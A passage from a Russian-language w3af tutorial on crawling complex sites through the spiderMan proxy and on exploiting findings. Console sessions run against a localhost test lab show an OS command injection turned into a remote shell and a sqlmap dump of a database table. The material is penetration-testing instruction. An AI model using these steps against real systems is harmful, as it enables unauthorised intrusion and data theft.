Сложноструктурные сайты.
Некоторые сайты содержат в себе специфические объекты типа Flash-элементов или Java-апплетов. Это не позволяет получать фреймворку информацию о ссылках стандартным способом. Специально для этого создан скрипт spiderMan. Он запускает http-прокси-сервер через который пользователь должен бродить по сайту. В это время скрипт будет извлекать из запросов и ответов сервера нужную ему информацию.
Как пример рассмотрим следующую ситуацию. Допустим что w3af проверил сайт и не нашёл ни одной ссылки на главной странице. После более подробного рассмотрения оказывается что на главной странице находится навигационное меню, представляющее из себя Java-аплет. Пользователь запускает w3af снова и активирует плагин spiderMan, после чего бродит по сайту самостоятельно через прокси-сервер созданный этим плагином. Когда он заканчивает w3af запускает audit-плагины, передавая им ссылки найденные при помощи пользователя.
Вот простой пример работы с этим плагином:
w3af>>> plugins
w3af/plugins>>> discovery spiderMan
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/fileUpload/
w3af/target>>> back
w3af>>> start
spiderMan proxy is running on 127.0.0.1:44444 .
Please configure your browser to use these proxy settings and
navigate the target site. To exit spiderMan plugin please
navigate to http://127.7.7.7/spiderMan?terminate .
Теперь пользователь настраивает браузер на использование прокси-сервера по адресу 127.0.0.1:44444 и начинает бродить по сайту, после чего он проходит по ссылке "http://127.7.7.7/spiderMan?terminate", чем завершает работу spiderMan. Вот результат:
New URL found by discovery: http://localhost/w3af/test
New URL found by discovery: http://localhost/favicon.ico
New URL found by discovery: http://localhost/w3af/
New URL found by discovery: http://localhost/w3af/img/w3af.png
New URL found by discovery: http://localhost/w3af/xssforms/testforms.html
New URL found by discovery: http://localhost/w3af/xssforms/dataReceptor.php
The list of found URLs is:
http://localhost/w3af/fileUpload/
http://localhost/w3af/test
http://localhost/w3af/xssforms/dataReceptor.php
http://localhost/w3af/
http://localhost/w3af/img/w3af.png
http://localhost/w3af/xssforms/testforms.html
http://localhost/w3af/fileUpload/uploader.php
http://localhost/favicon.ico
Found 8 URLs and 8 different points of injection.
The list of Fuzzable requests is:
http://localhost/w3af/fileUpload/ | Method: GET
http://localhost/w3af/fileUpload/uploader.php | Method: POST | Parameters: (MAX_FILE_SIZE,uploadedfile)
http://localhost/w3af/test | Method: GET
http://localhost/favicon.ico | Method: GET
http://localhost/w3af/ | Method: GET
http://localhost/w3af/img/w3af.png | Method: GET
http://localhost/w3af/xssforms/testforms.html | Method: GET
http://localhost/w3af/xssforms/dataReceptor.php | Method:POST | Parameters: (user,firstname)
Starting sqli plugin execution.
W3af>>>
Эксплуатация найденных уязвимостей
Существует два пути использования уязвимостей. Первый заключается в том чтобы дождаться фазы аудита, а второй в том чтобы вызывать exploit-плагин напрямую, указывая нужные ему параметры.
Давайте посмотрим на пример первого пути - эксплуатации уязвимостей автоматическими механизмами w3af:
w3af>>>plugins
w3af/plugins>>>audit osCommanding
w3af/plugins>>>back
w3af>>>target
w3af/config:target>>>set target
http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/config:target>>>back
w3af>>>start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
http://localhost/w3af/osCommanding/vulnerable.php | Method:
GET | Parameters: (command)
Starting osCommanding plugin execution.
OS Commanding was found at: "http://localhost/w3af/osCommanding/
vulnerable.php", using HTTP method GET. The sent data was:
"command=+ping+c+
9+localhost". The vulnerability was found in
the request with id 5.
Finished scanning process.
w3af>>>exploit
w3af/exploit>>>exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change
the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of
available shells:
[0] <osCommandingShell object (ruser: "wwwdata"| rsystem:"Linux brick 2.6.2419generic
i686 GNU/Linux")>Please use the interact command to interact with the shell
objects.
w3af/exploit>>>interact 0
Execute "endInteraction" to get out of the remote shell.
Commands typed in this menu will be runned on the remote web
server.
w3af/exploit/osCommandingShell0>>>
ls
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell0>>>
endInteraction
w3af/exploit>>>back
w3af>>>
Второй путь заключается в том чтобы вручную запустить exploit-плагин. Данный метод может пригодится когда пользователь самостоятельно нашёл уязвимость, но её эксплуатацию по каким-то причинам хочет провести с помощью фреймворка.
w3af>>> exploit
w3af/exploit>>> exploit config sqlmap
w3af/plugin/sqlmap>>> set url http://localhost/w3af/blindSqli/blindSqliinteger.php
w3af/plugin/sqlmap>>> set injvar id
w3af/plugin/sqlmap>>> set data id=1
w3af/plugin/sqlmap>>> back
w3af/exploit>>> fastexploit sqlmap
sqlmap coded by inquis <bernardo.damele@gmail.com> and belch
<daniele.bellucci@gmail.com>
SQL injection could be verified, trying to create the DB driver.
Execute "exitPlugin" to get out of the remote shell. Commands
typed in this menu will be runned on the remote web server.
w3af/exploit/sqlmap>>> dump agenda w3af_test
Database: w3af_test
Table: agenda
[2 entries]
+----------------------------------------------------------------+
+------------------+ ---+-----------+------------+------------+
| direccion | id | nombre | telefono | email |
+----------------------------------------------------------------+
+------------------+ ---+-----------+------------+------------+
| direccion 123 | 1 | apr | 52365786 | acho@c.com |
| direccion 333 | 2 | vico | 47998123 | vTro@c.com |
+----------------------------------------------------------------+
+------------------+ ---+-----------+------------+------------+
w3af/exploit/sqlmap>>>
Продвинутая техника эксплуатации уязвимостей
В фреймворке реализует две продвинутые техники использования уязвимостей. Они основаны на возможности фреймворка выполнять удалённо команды системы с помощью плагинов "remoteFileIncludeShell" и "davShell". Эти техники основаны на:
- Виртуальном демоне позволяющем выполнять код, сгенерированный Metasploit`ом, на удалённом сервере.
- w3afAgent, позволяющем создать SOCKS-прокси на удалённом сервере.
Обе из них просты в использовании и настройке. Но они пока что плохо проработаны и не факт что у Вас будут работать стабильно. В случае их использования Вы действуйте на свой страх и риск.